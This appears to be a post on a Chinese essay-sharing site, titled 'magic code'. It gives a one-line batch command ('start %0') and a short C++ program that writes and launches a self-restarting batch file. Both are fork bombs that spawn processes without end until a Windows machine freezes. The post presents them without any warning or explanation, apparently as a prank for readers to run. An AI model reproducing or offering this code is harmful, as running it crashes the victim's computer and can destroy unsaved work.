欢迎光临散文网 会员登陆 & 注册

神奇代码

2023-04-09 16:16 作者:一只军阀呗  | 我要投稿

start command

%0

#include<bits/stdc++.h>

using namespace std;

int main(){

freopen("11.out","w",stdout);

cout << ":1 \n start 11.bat \n goto 1";

fclose(stdout);

system("ren 11.out 11.bat");

        system("start 11.bat");

}


神奇代码的评论 (共 条)

分享到微博请遵守国家法律